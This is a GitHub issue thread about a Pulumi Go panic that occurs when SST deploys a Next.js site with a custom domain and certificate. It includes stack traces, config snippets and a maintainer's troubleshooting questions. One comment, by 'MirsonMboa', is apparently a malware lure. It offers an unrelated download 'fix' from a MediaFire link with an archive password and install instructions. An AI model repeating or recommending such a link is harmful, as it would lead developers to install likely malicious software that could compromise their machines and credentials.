### ISSUE TITLE
Creating a certificate for Nextjs website results in pulumi go panic

### ISSUE THREAD

**Issue by JanStevens** [sst/ion#943]
Hi,

Using latest sst `3.0.70` and open-next `3.1.1`.

When trying to deploy a Nextjs website with a domain option I receive a go panic in pulumi:

```
{
  domain: {
    name: 'example.com',
    dns: sst.aws.dns(),
    aliases: ['www.example.com'],
  },
}
```

Following stack trace, it seems to be an issue with switching to us-east-1 and creating a certificate.
```
OpenNext build complete.
|  Updated     Nextjs sst:aws:Nextjs → NextjsBuild sst:Run (72.5s)
panic: interface conversion: interface {} is string, not resource.PropertyMap
goroutine 28 [running]:
github.com/pulumi/pulumi/sdk/v3/go/common/resource.PropertyValue.ObjectValue(...)
        /home/runner/go/pkg/mod/github.com/pulumi/pulumi/sdk/v3@v3.129.0/go/common/resource/properties.go:462
github.com/pulumi/pulumi-aws/provider/v6.validateCredentials(0x14007774510, {0x111449f2c?, 0x0?})
        /home/runner/work/pulumi-aws/pulumi-aws/provider/resources.go:620 +0xf3c
github.com/pulumi/pulumi-aws/provider/v6.ProviderFromMeta.preConfigureCallback.func24(0x14007774510, {0x116830c60, 0x14007792050})
        /home/runner/work/pulumi-aws/pulumi-aws/provider/resources.go:787 +0xf4
github.com/pulumi/pulumi-terraform-bridge/v3/pkg/tfbridge.(*Provider).preConfigureCallback(0x14000a22008, {0x116aaf718?, 0x140077746c0?}, 0x14007774510, {0x116830c60, 0x14007792050})
|  Error       AwsProvider sst:us-east-1
|  rpc error: code = Unavailable desc = error reading from server: EOF
```

What does help is creating the certificate manually and passing it in:

```
{
  domain: {
    name: 'example.com',
    dns: sst.aws.dns(),
    aliases: ['www.example.com'],
    cert: 'arn:...'
  },
}
```

Regards

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by fwang** [comment]
@JanStevens I'm not able to reproduce on my end. It might be related to your AWS credentials, I'm not sure.

- How is ur AWS credentials configured? (ie. SSO? key/secrets in .aws/credentials? etc)
- Can you try deploying again without passing in `cert`?

@thdxr The error comes from this line https://github.com/pulumi/pulumi-aws/blob/master/provider/resources.go#L620 where `details` seems to be a string instead of a map. Any ides?

**Comment by JanStevens** [comment]
> @JanStevens I'm not able to reproduce on my end. It might be related to your AWS credentials, I'm not sure.
> 
> * How is ur AWS credentials configured? (ie. SSO? key/secrets in .aws/credentials? etc)
> * Can you try deploying again without passing in `cert`?
> 

Hi, our $config app contains the following:

```typescript
app(input) {
  return {
    name: 'nextjs-site',
    version: '3.0.70',
    removal: input.stage === 'production' ? 'retain' : 'remove',
    home: 'aws',
    providers: {
      aws: {
        region: 'me-south-1',
        profile: 'nextjs-site',
        assumeRole: {
          roleArn: 'arn:aws:iam::123456789:role/sst',
          sessionName: 'sst-deploy',
        },
      },
    },
  };
},
```

In my .aws/credentials I have defined the correct profile with credentials. I've also the following env variables in case that causes any issues.

```
AWS_REGION = "me-south-1"
AWS_PROFILE = "nextjs-site"
```

The assumed role has full administration privileges on the account, the same account is also used to deploy a pretty big sst stack without any issues.

If I try to deploy again without the `cert` I get the same issue
